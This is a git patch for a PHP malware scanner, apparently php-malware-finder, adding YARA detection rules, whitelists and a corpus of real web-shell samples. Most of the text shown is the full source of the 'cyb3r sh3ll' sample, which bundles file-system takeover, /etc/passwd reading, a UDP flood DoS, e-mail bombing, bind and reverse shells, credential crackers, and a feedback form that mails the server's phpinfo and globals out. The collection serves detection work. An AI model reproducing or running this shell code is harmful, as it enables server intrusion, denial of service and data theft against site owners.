From 48936efa96ae17295be4e0a71be3294f0ec6aef8 Mon Sep 17 00:00:00 2001 From: Mathieu Deous Date: Mon, 2 May 2022 20:18:23 +0200 Subject: Make application go-install-able and create a docker image --- data/php.yar | 374 + data/samples/artificial/bypasses.php | 7 + data/samples/artificial/dodgy.php | 18 + data/samples/artificial/obfuscated.php | 8 + data/samples/classic/ajaxshell.php | 652 ++ data/samples/classic/angel.php | 2149 ++++++ data/samples/classic/b374k.php | 10 + data/samples/classic/c100.php | 3154 ++++++++ data/samples/classic/c99.php | 3157 ++++++++ data/samples/classic/cyb3rsh3ll.php | 7923 ++++++++++++++++++++ data/samples/classic/r57.php | 2302 ++++++ data/samples/classic/simattacker.php | 756 ++ data/samples/classic/sosyete.php | 225 + data/samples/cpanel.php | 20 + data/samples/freepbx.php | 14 + data/samples/obfuscators/cipher_design.php | 2 + data/samples/obfuscators/online_php_obfuscator.php | 1 + data/samples/obfuscators/phpencode.php | 1 + data/samples/real/awvjtnz.php | 4 + data/samples/real/exceptions.php | 1 + data/samples/real/guidtz.php | 76 + data/samples/real/ice.php | 1 + data/samples/real/include.php | 4 + data/samples/real/nano.php | 1 + data/samples/real/ninja.php | 1 + data/samples/real/novahot.php | 130 + data/samples/real/srt.php | 5 + data/samples/real/sucuri_2014_04.php | 3 + data/samples/undetected/smart.php | 2 + data/whitelist.yar | 129 + data/whitelists/custom.yar | 13 + data/whitelists/drupal.yar | 660 ++ data/whitelists/magento1ce.yar | 504 ++ data/whitelists/magento2.yar | 563 ++ data/whitelists/phpmyadmin.yar | 93 + data/whitelists/prestashop.yar | 468 ++ data/whitelists/symfony.yar | 60 + data/whitelists/wordpress.yar | 1046 +++ 38 files changed, 24537 insertions(+) create mode 100644 data/php.yar create mode 100644 data/samples/artificial/bypasses.php create mode 100644 data/samples/artificial/dodgy.php create mode 100644 data/samples/artificial/obfuscated.php create mode 100644 data/samples/classic/ajaxshell.php create mode 100644 data/samples/classic/angel.php create mode 100644 data/samples/classic/b374k.php create mode 100644 data/samples/classic/c100.php create mode 100644 data/samples/classic/c99.php create mode 100644 data/samples/classic/cyb3rsh3ll.php create mode 100644 data/samples/classic/r57.php create mode 100644 data/samples/classic/simattacker.php create mode 100644 data/samples/classic/sosyete.php create mode 100644 data/samples/cpanel.php create mode 100644 data/samples/freepbx.php create mode 100644 data/samples/obfuscators/cipher_design.php create mode 100644 data/samples/obfuscators/online_php_obfuscator.php create mode 100644 data/samples/obfuscators/phpencode.php create mode 100644 data/samples/real/awvjtnz.php create mode 100644 data/samples/real/exceptions.php create mode 100644 data/samples/real/guidtz.php create mode 100644 data/samples/real/ice.php create mode 100644 data/samples/real/include.php create mode 100644 data/samples/real/nano.php create mode 100644 data/samples/real/ninja.php create mode 100644 data/samples/real/novahot.php create mode 100644 data/samples/real/srt.php create mode 100644 data/samples/real/sucuri_2014_04.php create mode 100644 data/samples/undetected/smart.php create mode 100644 data/whitelist.yar create mode 100644 data/whitelists/custom.yar create mode 100644 data/whitelists/drupal.yar create mode 100644 data/whitelists/magento1ce.yar create mode 100644 data/whitelists/magento2.yar create mode 100644 data/whitelists/phpmyadmin.yar create mode 100644 data/whitelists/prestashop.yar create mode 100644 data/whitelists/symfony.yar create mode 100644 data/whitelists/wordpress.yar (limited to 'data') diff --git a/data/php.yar b/data/php.yar new file mode 100644 index 0000000..4470e1b --- /dev/null +++ b/data/php.yar @@ -0,0 +1,374 @@ +import "hash" +include "whitelist.yar" + +/* + Detect: + - phpencode.org + - http://www.pipsomania.com/best_php_obfuscator.do + - http://atomiku.com/online-php-code-obfuscator/ + - http://www.webtoolsvn.com/en-decode/ + - http://obfuscator.uk/example/ + - http://w3webtools.com/encode-php-online/ + - http://www.joeswebtools.com/security/php-obfuscator/ + - https://github.com/epinna/weevely3 + - http://cipherdesign.co.uk/service/php-obfuscator + - http://sysadmin.cyklodev.com/online-php-obfuscator/ + - http://mohssen.org/SpinObf.php + - https://code.google.com/p/carbylamine/ + - https://github.com/tennc/webshell + + - https://github.com/wireghoul/htshells + + Thanks to: + - https://stackoverflow.com/questions/3115559/exploitable-php-functions +*/ + +global private rule IsPhp +{ + strings: + $php = /<\?[^x]/ + + condition: + $php and filesize < 5MB +} + +rule NonPrintableChars +{ + strings: + /* + Searching only for non-printable characters completely kills the perf, + so we have to use atoms (https://gist.github.com/Neo23x0/e3d4e316d7441d9143c7) + to get an acceptable speed. + */ + $non_printables = /(function|return|base64_decode).{,256}[^\x09-\x0d\x20-\x7E]{3}/ + + condition: + (any of them) and not IsWhitelisted +} + + +rule PasswordProtection +{ + strings: + $md5 = /md5\s*\(\s*\$_(GET|REQUEST|POST|COOKIE|SERVER)[^)]+\)\s*===?\s*['"][0-9a-f]{32}['"]/ nocase + $sha1 = /sha1\s*\(\s*\$_(GET|REQUEST|POST|COOKIE|SERVER)[^)]+\)\s*===?\s*['"][0-9a-f]{40}['"]/ nocase + condition: + (any of them) and not IsWhitelisted +} + +rule ObfuscatedPhp +{ + strings: + $eval = /(<\?php|[;{}])[ \t]*@?(eval|preg_replace|system|assert|passthru|(pcntl_)?exec|shell_exec|call_user_func(_array)?)\s*\(/ nocase // ;eval( <- this is dodgy + $eval_comment = /(eval|preg_replace|system|assert|passthru|(pcntl_)?exec|shell_exec|call_user_func(_array)?)\/\*[^\*]*\*\/\(/ nocase // eval/*lol*/( <- this is dodgy + $b374k = "'ev'.'al'" + $align = /(\$\w+=[^;]*)*;\$\w+=@?\$\w+\(/ //b374k + $weevely3 = /\$\w=\$[a-zA-Z]\('',\$\w\);\$\w\(\);/ // weevely3 launcher + $c99_launcher = /;\$\w+\(\$\w+(,\s?\$\w+)+\);/ // http://bartblaze.blogspot.fr/2015/03/c99shell-not-dead.html + $nano = /\$[a-z0-9-_]+\[[^]]+\]\(/ //https://github.com/UltimateHackers/nano + $ninja = /base64_decode[^;]+getallheaders/ //https://github.com/UltimateHackers/nano + $variable_variable = /\${\$[0-9a-zA-z]+}/ + $too_many_chr = /(chr\([\d]+\)\.){8}/ // concatenation of more than eight `chr()` + $concat = /(\$[^\n\r]+\.){5}/ // concatenation of more than 5 words + $concat_with_spaces = /(\$[^\n\r]+\. ){5}/ // concatenation of more than 5 words, with spaces + $var_as_func = /\$_(GET|POST|COOKIE|REQUEST|SERVER)\s*\[[^\]]+\]\s*\(/ + $comment = /\/\*([^*]|\*[^\/])*\*\/\s*\(/ // eval /* comment */ (php_code) +condition: + (any of them) and not IsWhitelisted +} + +rule DodgyPhp +{ + strings: + $basedir_bypass = /curl_init\s*\(\s*["']file:\/\// nocase + $basedir_bypass2 = "file:file:///" // https://www.intelligentexploit.com/view-details.html?id=8719 + $disable_magic_quotes = /set_magic_quotes_runtime\s*\(\s*0/ nocase + + $execution = /\b(popen|eval|assert|passthru|exec|include|system|pcntl_exec|shell_exec|base64_decode|`|array_map|ob_start|call_user_func(_array)?)\s*\(\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE|SERVER))/ nocase // function that takes a callback as 1st parameter + $execution2 = /\b(array_filter|array_reduce|array_walk(_recursive)?|array_walk|assert_options|uasort|uksort|usort|preg_replace_callback|iterator_apply)\s*\(\s*[^,]+,\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE|SERVER))/ nocase // functions that takes a callback as 2nd parameter + $execution3 = /\b(array_(diff|intersect)_u(key|assoc)|array_udiff)\s*\(\s*([^,]+\s*,?)+\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE|SERVER))\s*\[[^]]+\]\s*\)+\s*;/ nocase // functions that takes a callback as 2nd parameter + + $htaccess = "SetHandler application/x-httpd-php" + $iis_com = /IIS:\/\/localhost\/w3svc/ + $include = /include\s*\(\s*[^\.]+\.(png|jpg|gif|bmp)/ // Clever includes + $ini_get = /ini_(get|set|restore)\s*\(\s*['"](safe_mode|open_basedir|disable_(function|classe)s|safe_mode_exec_dir|safe_mode_include_dir|register_globals|allow_url_include)/ nocase + $pr = /(preg_replace(_callback)?|mb_ereg_replace|preg_filter)\s*\([^)]*(\/|\\x2f)(e|\\x65)['"]/ nocase // http://php.net/manual/en/function.preg-replace.php + $register_function = /register_[a-z]+_function\s*\(\s*['"]\s*(eval|assert|passthru|exec|include|system|shell_exec|`)/ // https://github.com/nbs-system/php-malware-finder/issues/41 + $safemode_bypass = /\x00\/\.\.\/|LD_PRELOAD/ + $shellshock = /\(\)\s*{\s*[a-z:]\s*;\s*}\s*;/ + $udp_dos = /fsockopen\s*\(\s*['"]udp:\/\// nocase + $various = " +

:: PHP Safe Mode Bypass ::

+

:: Make File/Directory ::

+

:: Go File/Directory ::

+ + + + +
(: List Directories :)
+ +

+ + Dir:

eg: /etc/
+$chemin
"; + +foreach ($files as $filename) { + + echo "
";
+
+   echo "$filename\n";
+
+   echo "
"; + +} + +} + + + +if(isset($_GET['directory'])) + +{ + +rsg_glob(); + +} + + + +?> + + +
+ + + +
[: Make Directory :]
 
+ + +
{: Go Directory :}
 
+ + + + + +
(: Read Files :)

+ +
+ +
File:

eg: /etc/passwd
+ Trying To Get File $get
"; + + if(copy("compress.zlib://".$file, $temp)){ + + $fichier = fopen($temp, "r"); + + $action = fread($fichier, filesize($temp)); + + fclose($fichier); + + $source=htmlspecialchars($action); + + echo "
Start $get

$source

Fin $get"; + + unlink($temp); + + } else { + + die("
Sorry... File + + ".htmlspecialchars($file)." dosen't exists or you don't have + + access.
"); + + } + + echo "
"; + + } + + + + if(isset($_GET['file'])) + +{ + +rsg_read(); + +} + + + + ?> + + +
+ +
+ +
+ + + +
[: Make File :]
 
+ + +
{: Go File :}
 
+ + + + + ";} + + } + + if (!empty($delerr)) {echo "Deleting with errors:
".$delerr;} + + $act = "ls"; + +} + +if ($act == "chmod") + +{ + + $mode = fileperms($d.$f); + + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + + else + + { + + $form = TRUE; + + if ($chmod_submit) + + { + + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + + else {$err = "Can't chmod to ".$octet.".";} + + } + + if ($form) + + { + + $perms = parse_perms($mode); + + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
".($err?"Error: ".$err:"")."
Owner

 Read
 Write
eXecute		Group

 Read
 Write
eXecute		World

 Read
 Write
eXecute
"; + + } + + } + +} + +if ($act == "search") + +{ + + echo "Search in file-system:
"; + + if (empty($search_in)) {$search_in = $d;} + + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + + if (!empty($submit)) + + { + + $found = array(); + + $found_d = 0; + + $found_f = 0; + + $search_i_f = 0; + + $search_i_d = 0; + + $a = array + + ( + + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + + "text_wwo"=>$search_text_wwo, + + "text_cs"=>$search_text_cs, + + "text_not"=>$search_text_not + + ); + + $searchtime = getmicrotime(); + + $in = array_unique(explode(";",$search_in)); + + foreach($in as $v) {cyb3rfsearch($v);} + + $searchtime = round(getmicrotime()-$searchtime,4); + + if (count($found) == 0) {echo "No files found!";} + + else + + { + + $ls_arr = $found; + + $disp_fullpath = TRUE; + + $act = "ls"; + + } + + } + + echo "
+ + + +Search for (file/folder name):   - regexp + +
Search in (explode \";\"): + +

Text:
+ +

- regexp + +   - whole words only + +   - case sensitive + +   - find files NOT containing the text + +

"; + + if ($act == "ls") {$dspact = $act; echo "
Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

";} + +} + +if ($act == "fsbuff") + +{ + + $arr_copy = $sess_data["copy"]; + + $arr_cut = $sess_data["cut"]; + + $arr = array_merge($arr_copy,$arr_cut); + + if (count($arr) == 0) {echo "
Buffer is empty!
";} + + else {echo "File-System buffer

"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} + +} + +if ($act == "d") + +{ + + if (!is_dir($d)) {echo "
Permision denied!
";} + + else + + { + + echo "Directory information:"; + + if (!$win) + + { + + echo "
Owner/Group "; + + $ow = posix_getpwuid(fileowner($d)); + + $gr = posix_getgrgid(filegroup($d)); + + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + + } + + echo "
Perms".view_perms_color($d)."
Create time ".date("d/m/Y H:i:s",filectime($d))."
Access time ".date("d/m/Y H:i:s",fileatime($d))."
MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

"; + + } + +} + +if ($act == "chmod") + +{ + + $mode = fileperms($d.$f); + + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + + else + + { + + $form = TRUE; + + if ($chmod_submit) + + { + + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + + else {$err = "Can't chmod to ".$octet.".";} + + } + + if ($form) + + { + + $perms = parse_perms($mode); + + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
".($err?"Error: ".$err:"")."
Owner

 Read
 Write
eXecute		Group

 Read
 Write
eXecute		World

 Read
 Write
eXecute
"; + + } + + } + +} + +if ($act == "f") + +{ + + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + + { + + if (file_exists($d.$f)) {echo "
Permision denied (".htmlspecialchars($d.$f).")!
";} + + else {echo "
File does not exists (".htmlspecialchars($d.$f).")!
Create
";} + + } + + else + + { + + $r = @file_get_contents($d.$f); + + $ext = explode(".",$f); + + $c = count($ext)-1; + + $ext = $ext[$c]; + + $ext = strtolower($ext); + + $rft = ""; + + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + + if (empty($ft)) {$ft = $rft;} + + $arr = array( + + array("","info"), + + array("","html"), + + array("","txt"), + + array("Code","code"), + + array("Session","phpsess"), + + array("","exe"), + + array("SDB","sdb"), + + array("","img"), + + array("","ini"), + + array("","download"), + + array("","notepad"), + + array("","edit") + + ); + + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
Select action/file-type:
"; + + foreach($arr as $t) + + { + + if ($t[1] == $rft) {echo " ".$t[0]."";} + + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + + else {echo " ".$t[0]."";} + + echo " (+) |"; + + } + + echo "
"; + + if ($ft == "info") + + { + + echo "Information:"; + + if (!$win) + + { + + echo "
Path ".$d.$f."
Size ".view_size(filesize($d.$f))."
MD5 ".md5_file($d.$f)."
Owner/Group "; + + $ow = posix_getpwuid(fileowner($d.$f)); + + $gr = posix_getgrgid(filegroup($d.$f)); + + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + + } + + echo "
Perms".view_perms_color($d.$f)."
Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

"; + + $fi = fopen($d.$f,"rb"); + + if ($fi) + + { + + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + + $n = 0; + + $a0 = "00000000
"; + + $a1 = ""; + + $a2 = ""; + + for ($i=0; $i";} + + $a1 .= "
"; + + $a2 .= "
"; + + } + + } + + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
";} + + echo "
".$a0."".$a1."".$a2."

"; + + } + + $encoded = ""; + + if ($base64 == 1) + + { + + echo "Base64 Encode
"; + + $encoded = base64_encode(file_get_contents($d.$f)); + + } + + elseif($base64 == 2) + + { + + echo "Base64 Encode + Chunk
"; + + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + + } + + elseif($base64 == 3) + + { + + echo "Base64 Encode + Chunk + Quotes
"; + + $encoded = base64_encode(file_get_contents($d.$f)); + + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + + } + + elseif($base64 == 4) + + { + + $text = file_get_contents($d.$f); + + $encoded = base64_decode($text); + + echo "Base64 Decode"; + + if (base64_encode($encoded) != $text) {echo " (failed)";} + + echo "
"; + + } + + if (!empty($encoded)) + + { + + echo "

"; + + } + + echo "HEXDUMP: [Full] [Preview]
Base64: + +[Encode + +[+chunk + +[+chunk+quotes + +[Decode + +

"; + + } + + elseif ($ft == "html") + + { + + if ($white) {@ob_clean();} + + echo $r; + + if ($white) {cyb3rexit();} + + } + + elseif ($ft == "txt") {echo "

".htmlspecialchars($r)."
";} + + elseif ($ft == "ini") {echo "
"; var_dump(parse_ini_file($d.$f,TRUE)); echo "
";} + + elseif ($ft == "phpsess") + + { + + echo "
";
+
+   $v = explode("|",$r);
+
+   echo $v[0]."
";
+
+   var_dump(unserialize($v[1]));
+
+   echo "
"; + + } + + elseif ($ft == "exe") + + { + + $ext = explode(".",$f); + + $c = count($ext)-1; + + $ext = $ext[$c]; + + $ext = strtolower($ext); + + $rft = ""; + + foreach($exeftypes as $k=>$v) + + { + + if (in_array($ext,$v)) {$rft = $k; break;} + + } + + $cmd = str_replace("%f%",$f,$rft); + + echo "Execute file:

Display in text-area
"; + + } + + elseif ($ft == "sdb") {echo "
"; var_dump(unserialize(base64_decode($r))); echo "
";} + + elseif ($ft == "code") + + { + + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + + { + + $arr = explode("\n",$r); + + if (count($arr == 18)) + + { + + include($d.$f); + + echo "phpBB configuration is detected in this file!
"; + + if ($dbms == "mysql4") {$dbms = "mysql";} + + if ($dbms == "mysql") {echo "Connect to DB

";} + + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by cyb3rell. Please, report us for fix.";} + + echo "Parameters for manual connect:
"; + + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
";} + + echo "
"; + + } + + } + + echo "
"; + + if (!empty($white)) {@ob_clean();} + + highlight_file($d.$f); + + if (!empty($white)) {cyb3rexit();} + + echo "
"; + + } + + elseif ($ft == "download") + + { + + @ob_clean(); + + header("Content-type: application/octet-stream"); + + header("Content-length: ".filesize($d.$f)); + + header("Content-disposition: attachment; filename=\"".$f."\";"); + + echo $r; + + exit; + + } + + elseif ($ft == "notepad") + + { + + @ob_clean(); + + header("Content-type: text/plain"); + + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + + echo($r); + + exit; + + } + + elseif ($ft == "img") + + { + + $inf = getimagesize($d.$f); + + if (!$white) + + { + + if (empty($imgsize)) {$imgsize = 20;} + + $width = $inf[0]/100*$imgsize; + + $height = $inf[1]/100*$imgsize; + + echo "
Size: "; + + $sizes = array("100","50","20"); + + foreach ($sizes as $v) + + { + + echo ""; + + if ($imgsize != $v ) {echo $v;} + + else {echo "".$v."";} + + echo "   "; + + } + + echo "

"; + + } + + else + + { + + @ob_clean(); + + $ext = explode($f,"."); + + $ext = $ext[count($ext)-1]; + + header("Content-type: ".$inf["mime"]); + + readfile($d.$f); + + exit; + + } + + } + + elseif ($ft == "edit") + + { + + if (!empty($submit)) + + { + + if ($filestealth) {$stat = stat($d.$f);} + + $fp = fopen($d.$f,"w"); + + if (!$fp) {echo "Can't write to file!";} + + else + + { + + echo "Saved!"; + + fwrite($fp,$edit_text); + + fclose($fp); + + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + + $r = $edit_text; + + } + + } + + $rows = count(explode("\r\n",$r)); + + if ($rows < 10) {$rows = 10;} + + if ($rows > 30) {$rows = 30;} + + echo "
  
"; + + } + + elseif (!empty($ft)) {echo "
Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
";} + + else {echo "
Unknown extension (".$ext."), please, select type manually.
";} + + } + +} + +if ($act == "about") +{ +echo '
Script:
-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
+Name: cyb3r sh3ll
Version: '.$shver.'

Author:
-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
+Name: cyb3r 9l4d!470r (Cyber Gladiator)
Country: India
Website: ????...
Email: cyb3r.gladiat0r@gmail.com +

Greetings:
-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
r45c4l bro you are my source of inspiration.
r8l35n4k, Cyb3R_s3CuR3 and all my friends who helped me a lot and they know for whom i\'m speaking.
Thanks all who report bugs and send to my email id.
'; +} + +if ($act == "dos") +{ +?>



+Server IP:

+Your IP:  (Don't DoS yourself nub)

+
+IP: + +    Time: + +    Port: + +

+ +

+
After initiating the DoS attack, please wait while the browser loads.
alert('Dos Completed!');"; +print "Flooded: $ip on port $rand

"; +$max_time = $time+$exec_time; + + + +for($i=0;$i<65535;$i++){ + $out .= "X"; +} +while(1){ +$packets++; + if(time() > $max_time){ + break; + } + + $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); + if($fp){ + fwrite($fp, $out); + fclose($fp); + } +} +echo "Packet complete at ". time() ." with $packets (" . round(($packets*65)/1024, 2) . " kB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n"; +} + +if ($act == "localdomain") +{ +echo "
Sites on this server. | List of Users.

"; +} + + if ($act == "local") + { + //radable public_html + $file = @implode(@file("/etc/named.conf")); + if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); } + preg_match_all("#named/(.*?).db#",$file ,$r); + $domains = array_unique($r[1]); + + function check() + { + (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):""; + } + + check(); + + echo " + + "; + + foreach($domains as $domain) + { + $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain)); + echo ""; + } + + echo "
[+] Here : [ ".count($domains)." ] Domain ...
List of DomainsList of Users
$domain".$user['name']."
"; +//radable public_html + } + + if ($act == "readable") + { + //entries in passwd file +($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('Error: safe_mode = on'); +set_time_limit(0); +################### +@$passwd = fopen('/etc/passwd','r'); +if (!$passwd) { die('[-] Error : coudn`t read /etc/passwd'); } +$pub = array(); +$users = array(); +$conf = array(); +$i = 0; +while(!feof($passwd)) +{ +$str = fgets($passwd); +if ($i > 35) +{ +$pos = strpos($str,':'); +$username = substr($str,0,$pos); +$dirz = '/home/'.$username.'/public_html/'; +if (($username != '')) +{ +if (is_readable($dirz)) +{ +array_push($users,$username); +array_push($pub,$dirz); +} +} +} +$i++; +} +################### +echo '



Coded by cyb3r 9l4d!470r Homepage'; + + + } + + + if ($act == "mailer") + { + ?> + + + + + + + + + + + + + + +

(: E-Mail Bomber :)

[: Mass Mailer :]

{: Anonymous Mailer :}

+ Some Error Occured!"; + break; + } + } + if($error != 1) + { echo "Mail(s) Sent!"; } + } + else + { + ?> +
"> + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ To + + +
+ Subject + + +
+ No. of Times + + +
+ + Pad your message (Less spam detection) + + + + + +
+ + + +
+
+ + +
+ Mail Sent!"; + } + else + { + echo "Some Error Occured!"; + } + } + else + { + ?> +
"> + + + + + + + + + + + + + + + + + + + + + + + + + +
+ From + + +
+ To + + +
+ Subject + + +
+ + + +
+
+ +
+
+ +
+ + + + + + + + + + + + + + + + + + +
Priority:
+ + +
 
+ +
Content-Type:
+
+ +
Proxy | Whois

"; +} + + if ($act == "feedback") + +{ + + $suppmail = base64_decode("Y3liM3IuZ2xhZGlhdDByQGdtYWlsLmNvbQ=="); + + if (!empty($submit)) + + { + + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + + $body = "cyb3r sh3llv.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + + if (!empty($fdbk_ref)) + + { + + $tmp = @ob_get_contents(); + + ob_clean(); + + phpinfo(); + + $phpinfo = base64_encode(ob_get_contents()); + + ob_clean(); + + echo $tmp; + + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + + } + + mail($suppmail,"cyb3r sh3ll v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + + echo "
Thanks for your feedback! Your ticket ID: ".$ticket.".
"; + + } + + else {echo "
Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

Your name:

Your e-mail:

Message:


Attach server-info *

There are no checking in the form.

* - strongly recommended, if you report bug, because we need it for bug-fix.

We understand languages: English, Hindi.

";} + +} + +if ($act == "systeminfo") {echo system('systeminfo');} + +if ($act == "phpinfo") {@ob_clean(); phpinfo(); cyb3rexit(); } + +if ($act == "upload") + +{ + echo "File upload:
+ +Select file on your local computer:
               or
+ +Save this file dir:

+ +File-name (auto-fill):

+ + + +
"; +$target = $_POST['path']; + $target = $target .'\\'. basename( $_FILES['uploaded']['name']) ; + $ok=1; +if (isset($_FILES['uploaded']['name'])) { + if (file_exists($target)) + { + echo $_FILES["uploaded"]["name"] . " already exists. "; + } + else + { + if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target)) + { + echo "Upload: " . $_FILES["uploaded"]["name"] . "
"; + echo "Type: " . $_FILES["uploaded"]["type"] . "
"; + echo "Size: " . round(($_FILES["uploaded"]["size"] / 1024),3) . " Kb
"; + echo "Stored in: " . $target; + } + else + { + echo "Sorry, there was a problem uploading your file."; + } + } + } +} +if ($act == "whois") +{ +global $t,$hcwd; +if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){ +$server =$_REQUEST['server']; +$domain=$_REQUEST['domain']."\r\n"; +$ser=fsockopen($server,43,$en,$es,5); +fputs($ser,$domain); +echo "
";
+while(!feof($ser))echo fgets($ser);
+echo "
"; +fclose($ser); +} +else{ +echo "
Whois:
Server:
domain:
$hcwd
"; +} +} + + + +if ($act == "cracker") +{ + echo " +
+Hash -|- +SMTP -|- +POP3 -|- +IMAP -|- +FTP -|- +SNMP -|- +MySQL -|- +HTTP Form -|- +HTTP Auth(basic) -|- +CPANEL -|- +Dictionary Maker +

"; +} + +if ($act == "shells") +{ ?> + + + + + + + + + + + + + +

(: Bind/Reverse Shell :)

[: Web Shell :]

+ array("Using PERL","perl %path %port"), + + "cyb3r_bindport.c"=>array("Using C","%path %port %pass") + + ); + + $bcsrcs = array( + + "cyb3r_backconn.pl"=>array("Using PERL","perl %path %host %port"), + + "cyb3r_backconn.c"=>array("Using C","%path %host %port") + + ); + + $dpsrcs = array( + + "cyb3r_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), + + "cyb3r_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") + + ); + + if (!is_array($bind)) {$bind = array();} + + if (!is_array($bc)) {$bc = array();} + + if (!is_array($datapipe)) {$datapipe = array();} + + + + if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} + + if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + + + + if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} + + if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} + + + + if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} + + if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} + + if (!empty($bindsubmit)) + + { + + echo "Result of binding port:
"; + + $v = $bndportsrcs[$bind["src"]]; + + if (empty($v)) {echo "Unknown file!
";} + + elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
";} + + else + + { + + $w = explode(".",$bind["src"]); + + $ext = $w[count($w)-1]; + + unset($w[count($w)-1]); + + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + + $binpath = $tmpdir.join(".",$w).rand(0,999); + + if ($ext == "pl") {$binpath = $srcpath;} + + @unlink($srcpath); + + $fp = fopen($srcpath,"ab+"); + + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
